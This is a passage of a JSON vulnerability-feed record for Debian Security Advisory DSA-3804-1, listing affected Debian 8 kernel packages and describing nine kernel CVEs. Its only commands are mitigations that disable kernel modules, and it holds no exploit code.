"linux-headers-3.16.0-4-armmp-lpae_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-4-armmp-lpae", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-support-3.16.0-6_3.16.39-1+deb8u2_all.deb", "packageName": "linux-support-3.16.0-6", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-7-586_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-7-586", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-image-3.16.0-4-686-pae_3.16.39-1+deb8u2_all.deb", "packageName": "linux-image-3.16.0-4-686-pae", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-4-all-i386_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-4-all-i386", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-5-all_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-5-all", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "xen-linux-system-3.16.0-4-amd64_3.16.39-1+deb8u2_all.deb", "packageName": "xen-linux-system-3.16.0-4-amd64", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-image-3.16.0-6-versatile_3.16.39-1+deb8u2_all.deb", "packageName": "linux-image-3.16.0-6-versatile", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-image-3.16.0-6-686-pae_3.16.39-1+deb8u2_all.deb", "packageName": "linux-image-3.16.0-6-686-pae", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-5-common_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-5-common", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-7-amd64_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-7-amd64", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-4-orion5x_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-4-orion5x", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-4-ixp4xx_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-4-ixp4xx", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-source-3.16_3.16.39-1+deb8u2_all.deb", "packageName": "linux-source-3.16", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-7-orion5x_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-7-orion5x", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-compiler-gcc-4.8-arm_3.16.39-1+deb8u2_all.deb", "packageName": "linux-compiler-gcc-4.8-arm", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-5-armmp-lpae_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-5-armmp-lpae", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-7-armmp-lpae_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-7-armmp-lpae", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-image-3.16.0-6-586_3.16.39-1+deb8u2_all.deb", "packageName": "linux-image-3.16.0-6-586", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-image-3.16.0-7-686-pae-dbg_3.16.39-1+deb8u2_all.deb", "packageName": "linux-image-3.16.0-7-686-pae-dbg", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "xen-linux-system-3.16.0-7-amd64_3.16.39-1+deb8u2_all.deb", "packageName": "xen-linux-system-3.16.0-7-amd64", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-image-3.16.0-4-686-pae-dbg_3.16.39-1+deb8u2_all.deb", "packageName": "linux-image-3.16.0-4-686-pae-dbg", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-4-586_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-4-586", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-7-common_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-7-common", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-6-all_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-6-all", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-image-3.16.0-4-amd64-dbg_3.16.39-1+deb8u2_all.deb", "packageName": "linux-image-3.16.0-4-amd64-dbg", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-image-3.16.0-5-686-pae_3.16.39-1+deb8u2_all.deb", "packageName": "linux-image-3.16.0-5-686-pae", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-image-3.16.0-7-amd64_3.16.39-1+deb8u2_all.deb", "packageName": "linux-image-3.16.0-7-amd64", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-manual-3.16_3.16.39-1+deb8u2_all.deb", "packageName": "linux-manual-3.16", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-image-3.16.0-5-amd64-dbg_3.16.39-1+deb8u2_all.deb", "packageName": "linux-image-3.16.0-5-amd64-dbg", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-6-amd64_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-6-amd64", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-5-armmp_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-5-armmp", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-image-3.16.0-6-ixp4xx_3.16.39-1+deb8u2_all.deb", "packageName": "linux-image-3.16.0-6-ixp4xx", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-4-all-armel_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-4-all-armel", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-image-3.16.0-6-armmp-lpae_3.16.39-1+deb8u2_all.deb", "packageName": "linux-image-3.16.0-6-armmp-lpae", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux_3.16.39-1+deb8u2_all.deb", "packageName": "linux", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-6-common_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-6-common", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-image-3.16.0-6-686-pae-dbg_3.16.39-1+deb8u2_all.deb", "packageName": "linux-image-3.16.0-6-686-pae-dbg", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-image-3.16.0-7-586_3.16.39-1+deb8u2_all.deb", "packageName": "linux-image-3.16.0-7-586", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-4-versatile_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-4-versatile", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-image-3.16.0-5-amd64_3.16.39-1+deb8u2_all.deb", "packageName": "linux-image-3.16.0-5-amd64", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-image-3.16.0-7-amd64-dbg_3.16.39-1+deb8u2_all.deb", "packageName": "linux-image-3.16.0-7-amd64-dbg", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "xen-linux-system-3.16.0-5-amd64_3.16.39-1+deb8u2_all.deb", "packageName": "xen-linux-system-3.16.0-5-amd64", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-image-3.16.0-6-amd64-dbg_3.16.39-1+deb8u2_all.deb", "packageName": "linux-image-3.16.0-6-amd64-dbg", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-image-3.16.0-5-armmp_3.16.39-1+deb8u2_all.deb", "packageName": "linux-image-3.16.0-5-armmp", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-support-3.16.0-7_3.16.39-1+deb8u2_all.deb", "packageName": "linux-support-3.16.0-7", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-4-all-armhf_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-4-all-armhf", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-image-3.16.0-5-versatile_3.16.39-1+deb8u2_all.deb", "packageName": "linux-image-3.16.0-5-versatile", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-6-all-armel_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-6-all-armel", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-image-3.16.0-6-kirkwood_3.16.39-1+deb8u2_all.deb", "packageName": "linux-image-3.16.0-6-kirkwood", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-compiler-gcc-4.9-x86_3.16.39-1+deb8u2_all.deb", "packageName": "linux-compiler-gcc-4.9-x86", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-image-3.16.0-7-versatile_3.16.39-1+deb8u2_all.deb", "packageName": "linux-image-3.16.0-7-versatile", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-5-586_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-5-586", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-6-586_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-6-586", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-5-ixp4xx_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-5-ixp4xx", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-6-orion5x_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-6-orion5x", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-6-kirkwood_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-6-kirkwood", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-6-versatile_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-6-versatile", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-image-3.16.0-7-armmp-lpae_3.16.39-1+deb8u2_all.deb", "packageName": "linux-image-3.16.0-7-armmp-lpae", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-4-686-pae_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-4-686-pae", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-6-armmp_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-6-armmp", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-7-versatile_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-7-versatile", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-image-3.16.0-6-amd64_3.16.39-1+deb8u2_all.deb", "packageName": "linux-image-3.16.0-6-amd64", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-image-3.16.0-7-686-pae_3.16.39-1+deb8u2_all.deb", "packageName": "linux-image-3.16.0-7-686-pae", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-image-3.16.0-4-ixp4xx_3.16.39-1+deb8u2_all.deb", "packageName": "linux-image-3.16.0-4-ixp4xx", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-image-3.16.0-4-kirkwood_3.16.39-1+deb8u2_all.deb", "packageName": "linux-image-3.16.0-4-kirkwood", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-image-3.16.0-5-kirkwood_3.16.39-1+deb8u2_all.deb", "packageName": "linux-image-3.16.0-5-kirkwood", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-7-all-amd64_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-7-all-amd64", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-5-orion5x_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-5-orion5x", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-image-3.16.0-4-versatile_3.16.39-1+deb8u2_all.deb", "packageName": "linux-image-3.16.0-4-versatile", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-5-all-i386_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-5-all-i386", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-image-3.16.0-7-armmp_3.16.39-1+deb8u2_all.deb", "packageName": "linux-image-3.16.0-7-armmp", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-5-all-amd64_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-5-all-amd64", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-7-ixp4xx_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-7-ixp4xx", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-6-all-i386_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-6-all-i386", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-image-3.16.0-7-ixp4xx_3.16.39-1+deb8u2_all.deb", "packageName": "linux-image-3.16.0-7-ixp4xx", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-image-3.16.0-5-armmp-lpae_3.16.39-1+deb8u2_all.deb", "packageName": "linux-image-3.16.0-5-armmp-lpae", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-6-all-amd64_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-6-all-amd64", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-compiler-gcc-4.8-x86_3.16.39-1+deb8u2_all.deb", "packageName": "linux-compiler-gcc-4.8-x86", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-5-all-armel_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-5-all-armel", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-6-ixp4xx_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-6-ixp4xx", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-image-3.16.0-5-ixp4xx_3.16.39-1+deb8u2_all.deb", "packageName": "linux-image-3.16.0-5-ixp4xx", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-5-amd64_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-5-amd64", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-5-686-pae_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-5-686-pae", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-7-all-i386_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-7-all-i386", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-libc-dev_3.16.39-1+deb8u2_all.deb", "packageName": "linux-libc-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-4-common_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-4-common", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-6-686-pae_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-6-686-pae", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-image-3.16.0-6-armmp_3.16.39-1+deb8u2_all.deb", "packageName": "linux-image-3.16.0-6-armmp", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-image-3.16.0-4-orion5x_3.16.39-1+deb8u2_all.deb", "packageName": "linux-image-3.16.0-4-orion5x", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-4-amd64_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-4-amd64", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-4-kirkwood_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-4-kirkwood", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-image-3.16.0-4-amd64_3.16.39-1+deb8u2_all.deb", "packageName": "linux-image-3.16.0-4-amd64", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-7-armmp_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-7-armmp", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-5-versatile_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-5-versatile", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-image-3.16.0-5-586_3.16.39-1+deb8u2_all.deb", "packageName": "linux-image-3.16.0-5-586", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "xen-linux-system-3.16.0-6-amd64_3.16.39-1+deb8u2_all.deb", "packageName": "xen-linux-system-3.16.0-6-amd64", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-support-3.16.0-4_3.16.39-1+deb8u2_all.deb", "packageName": "linux-support-3.16.0-4", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-7-all-armel_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-7-all-armel", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-image-3.16.0-7-kirkwood_3.16.39-1+deb8u2_all.deb", "packageName": "linux-image-3.16.0-7-kirkwood", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-image-3.16.0-5-orion5x_3.16.39-1+deb8u2_all.deb", "packageName": "linux-image-3.16.0-5-orion5x", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-image-3.16.0-4-armmp-lpae_3.16.39-1+deb8u2_all.deb", "packageName": "linux-image-3.16.0-4-armmp-lpae", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-7-all_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-7-all", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-image-3.16.0-4-586_3.16.39-1+deb8u2_all.deb", "packageName": "linux-image-3.16.0-4-586", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-doc-3.16_3.16.39-1+deb8u2_all.deb", "packageName": "linux-doc-3.16", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-7-all-armhf_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-7-all-armhf", "operator": "lt"}], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3804-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nMarch 08, 2017 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : linux\nCVE ID : CVE-2016-9588 CVE-2017-2636 CVE-2017-5669 CVE-2017-5986 \n CVE-2017-6214 CVE-2017-6345 CVE-2017-6346 CVE-2017-6348 \n CVE-2017-6353\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or have other\nimpacts.\n\nCVE-2016-9588\n\n Jim Mattson discovered that the KVM implementation for Intel x86\n processors does not properly handle #BP and #OF exceptions in an\n L2 (nested) virtual machine. A local attacker in an L2 guest VM\n can take advantage of this flaw to cause a denial of service for\n the L1 guest VM.\n\nCVE-2017-2636\n\n Alexander Popov discovered a race condition flaw in the n_hdlc\n line discipline that can lead to a double free. A local\n unprivileged user can take advantage of this flaw for privilege\n escalation. On systems that do not already have the n_hdlc module\n loaded, this can be mitigated by disabling it:\n echo >> /etc/modprobe.d/disable-n_hdlc.conf install n_hdlc false\n\nCVE-2017-5669\n\n Gareth Evans reported that privileged users can map memory at\n address 0 through the shmat() system call. This could make it\n easier to exploit other kernel security vulnerabilities via a\n set-UID program.\n\nCVE-2017-5986\n\n Alexander Popov reported a race condition in the SCTP\n implementation that can be used by local users to cause a\n denial-of-service (crash). The initial fix for this was incorrect\n and introduced further security issues (CVE-2017-6353). This\n update includes a later fix that avoids those. On systems that do\n not already have the sctp module loaded, this can be mitigated by\n disabling it:\n echo >> /etc/modprobe.d/disable-sctp.conf install sctp false\n\nCVE-2017-6214\n\n Dmitry Vyukov reported a bug in the TCP implementation's handling\n of urgent data in the splice() system call. This can be used by a\n remote attacker for denial-of-service (hang) against applications\n that read from TCP sockets with splice().\n\nCVE-2017-6345\n\n Andrey Konovalov reported that the LLC type 2 implementation\n incorrectly assigns socket buffer ownership. This can be used\n by a local user to cause a denial-of-service (crash). On systems\n that do not already have the llc2 module loaded, this can be\n mitigated by disabling it:\n echo >> /etc/modprobe.d/disable-llc2.conf install llc2 false\n\nCVE-2017-6346\n\n Dmitry Vyukov reported a race condition in the raw packet (af_packet)\n fanout feature. Local users with the CAP_NET_RAW capability (in any\n user namespace) can use this for denial-of-service and possibly for\n privilege escalation.\n\nCVE-2017-6348\n\n Dmitry Vyukov reported that the general queue implementation in\n the IrDA subsystem does not properly manage multiple locks,\n possibly allowing local users to cause a denial-of-service\n (deadlock) via crafted operations on IrDA devices.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 3.16.39-1+deb8u2.\n\nWe recommend that you upgrade your linux packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 1, "reporter": "Debian", "published": "2017-03-08T17:00:25", "title": "[SECURITY] [DSA 